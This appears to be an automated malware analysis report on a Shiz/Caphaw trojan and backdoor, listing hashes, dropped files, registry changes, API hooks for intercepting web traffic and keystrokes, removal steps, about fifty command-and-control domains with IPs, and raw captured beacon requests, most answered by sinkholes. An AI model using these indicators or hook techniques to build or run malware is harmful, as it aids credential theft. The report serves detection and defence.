HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Razy.89444 (B) (Emsisoft), Gen:Variant.Razy.89444 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2691b3ba044ebaa82b18b8bef51b5705
SHA1: 77fb08ba6e496594b5176853682c43f5cd752e40
SHA256: 631d49f9e59d3a2220edda45d8f7bf1210f7e41a4e89e754a2920bdb3051c9d1
SSDeep: 6144:msBFm fWQX6VpYlaC0H2FLaOyaeYeflemO r4RmdT3hl/FTYSkN1:FrfWVWlngwLaFaZef1r4RYRl/Nj
Size: 279552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1999-05-12 16:25:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:556
The Trojan injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\vkyeif.exe (1983 bytes)
%System%\config\software (2132 bytes)
%System%\config\SOFTWARE.LOG (4003 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 7C 51 7F FE 80 59 3E 3E A6 CC 5E 62 8B E7 28"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\vkyeif.exe_, \??\%WinDir%\apppatch\vkyeif.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöTòj6º¤oD¬òd¼Œ¤Kô1,Å $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€ÂÂÂÂ\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂÂkDùâ€ÂÂaâ€ÂÂ*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÂÄZ¡r»ôâ€ÂÂ)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÂÃÂÂ=éÃâ€ÂÑщ¬q9|áÃÂÂù’‘ÃÂÂéšÄR"
Dropped PE files
MD5 | File path |
---|---|
843388d7262acc62eb45be199012560d | c:\WINDOWS\AppPatch\vkyeif.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:556
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\vkyeif.exe (1983 bytes)
%System%\config\software (2132 bytes)
%System%\config\SOFTWARE.LOG (4003 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Unistylist
Product Name: wasteword
Product Version: 2.9.3.7
Legal Copyright: molinia
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.9.5.1
File Description: lowan
Comments:
Language: English (United States)
Company Name: UnistylistProduct Name: wastewordProduct Version: 2.9.3.7Legal Copyright: moliniaLegal Trademarks: Original Filename: Internal Name: File Version: 2.9.5.1File Description: lowanComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 96739 | 96768 | 5.49523 | 7c17123fa44e40214e4c18cdfd070c6c |
.TmyIJuZ | 102400 | 2412 | 2560 | 0 | a371492f16c0940507435909603efe88 |
.pLeW | 106496 | 631 | 1024 | 0 | 0f343b0931126a20f133d67c2b018a3b |
.ODkL | 110592 | 3919 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
.data | 114688 | 35229 | 7168 | 4.84649 | 6da91eef3b28e5903994e51835b0e9bf |
.iFtr | 151552 | 4555 | 4608 | 4.10161 | 85115f04f3e92b81d0652d258cb11ba7 |
.rdata | 159744 | 133123 | 133632 | 5.53439 | 4700b228beb21fbe9d8db21063f80e13 |
.sVZxM | 294912 | 3089 | 3584 | 0 | b4202f7fe985b9648b4676e6f70832bd |
.XSZcc | 299008 | 1863 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.rsrc | 303104 | 17464 | 17920 | 2.52651 | c298c9eed152c60b3c712244ba78f204 |
.NaKWH | 323584 | 2405 | 2560 | 0 | a371492f16c0940507435909603efe88 |
.ghVZOjc | 327680 | 1770 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
.ueYo | 331776 | 436 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
68d8bfe848092a071135009607227f63
864a44f75a75096c4f24124dbbaf7014
Network Activity
URLs
URL | IP |
---|---|
hxxp://digivehusyd.eu/login.php | 69.195.129.70 |
hxxp://kemocujufys.eu/login.php | |
hxxp://xuxusujenes.eu/login.php | 208.100.26.234 |
hxxp://keraborigin.eu/login.php | 95.211.174.92 |
hxxp://qekenilacap.eu/login.php | |
hxxp://lysovidacyx.eu/login.php | 23.253.126.58 |
hxxp://tufecagemyl.eu/login.php | 23.253.126.58 |
hxxp://norumikemem.eu/login.php | 23.253.126.58 |
hxxp://lykemujebeq.eu/login.php | 23.253.126.58 |
hxxp://foxivusozuc.eu/login.php | 23.253.126.58 |
hxxp://vocakemenir.eu/login.php | 23.253.126.58 |
hxxp://ryqecolijet.eu/login.php | 23.253.126.58 |
hxxp://xuqohyxeqak.eu/login.php | 23.253.126.58 |
hxxp://kefuwidijyp.eu/login.php | 23.253.126.58 |
hxxp://puvybivihox.eu/login.php | 23.253.126.58 |
hxxp://jeluganusog.eu/login.php | 23.253.126.58 |
hxxp://lyvejujolec.eu/login.php | 23.253.126.58 |
hxxp://nozulufynax.eu/login.php | 23.253.126.58 |
hxxp://cihunemyror.eu/login.php | 23.253.126.58 |
hxxp://vofozymufok.eu/login.php | 23.253.126.58 |
hxxp://ryleryqacic.eu/login.php | 23.253.126.58 |
hxxp://nopegymozow.eu/login.php | 23.253.126.58 |
hxxp://rynazuqihoj.eu/login.php | 23.253.126.58 |
hxxp://xugiqonenuz.eu/login.php | 69.195.129.70 |
hxxp://pupujeguper.eu/login.php | 23.253.126.58 |
hxxp://fodakyhijyv.eu/login.php | 23.253.126.58 |
hxxp://ciliqikytec.eu/login.php | 23.253.126.58 |
hxxp://kevedorozup.eu/login.php | 23.253.126.58 |
hxxp://dimutobihom.eu/login.php | 23.253.126.58 |
hxxp://mamixikusah.eu/login.php | 23.253.126.58 |
hxxp://jewuqyjywyv.eu/login.php | 23.253.126.58 |
hxxp://qekikyvutic.eu/login.php | 23.253.126.58 |
hxxp://tucyguqaciq.eu/login.php | 23.253.126.58 |
hxxp://jefapexytar.eu/login.php | 23.253.126.58 |
hxxp://qeqinuqypoq.eu/login.php | 23.253.126.58 |
hxxp://xuqufyduras.eu/login.php | 23.253.126.58 |
hxxp://puregivytoh.eu/login.php | 23.253.126.58 |
hxxp://galokusemus.eu/login.php | 23.253.126.58 |
hxxp://gadufiwabim.eu/login.php | 23.253.126.58 |
hxxp://qetuluvolos.eu/login.php | 23.253.126.58 |
hxxp://ganycyhywek.eu/login.php | 23.253.126.58 |
hxxp://qebahilojam.eu/login.php | 23.253.126.58 |
hxxp://ryhuzilywax.eu/login.php | 23.253.126.58 |
hxxp://fokyxazolar.eu/login.php | 23.253.126.58 |
hxxp://qexofyqihid.eu/login.php | 23.253.126.58 |
hxxp://lyruxyxaxaw.eu/login.php | 23.253.126.58 |
hxxp://xukovoruput.eu/login.php | 23.253.126.58 |
hxxp://nojejecebuw.eu/login.php | 23.253.126.58 |
hxxp://marytymenok.eu/login.php | 23.253.126.58 |
hxxp://gatedyhavyd.eu/login.php | 23.253.126.58 |
www.bing.com | 204.79.197.200 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:57 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:58 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:11 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=e6e6275c4b3ed34f5a86d53b80e7c8a3; Expires=Fri, 01 Sep 2023 17:41:33 GMT
Date: Fri, 02 Sep 2016 17:41:33 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:41:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 02 Sep 2016 17:41:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:42:09 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Fri, 02 Sep 2016 17:41:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
